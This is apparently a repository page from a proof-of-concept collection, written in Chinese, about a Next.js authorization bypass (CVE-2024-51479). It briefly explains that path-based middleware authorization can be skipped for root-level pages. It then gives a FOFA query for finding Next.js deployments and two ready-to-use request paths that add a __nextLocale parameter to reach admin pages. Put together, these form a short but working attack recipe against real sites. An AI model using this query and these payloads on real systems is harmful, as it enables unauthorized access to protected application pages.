POC/wpoc/Next/Next.js权限绕过(CVE-2024-51479).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

678 B
Raw Blame History

Next.js权限绕过(CVE-2024-51479)

Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。在受影响的版本中,如果 Next.js 应用程序正在基于路径名的中间件中执行授权则可能会绕过应用程序根目录下的页面的此授权允许未经授权访问Next.js应用程序中的根级页面这些页面本应受到授权检查的保护

fofa

app="NEXT.JS"

poc

/admin?__nextLocale=111
/admin/users?__nextLocale=anything

图片

漏洞来源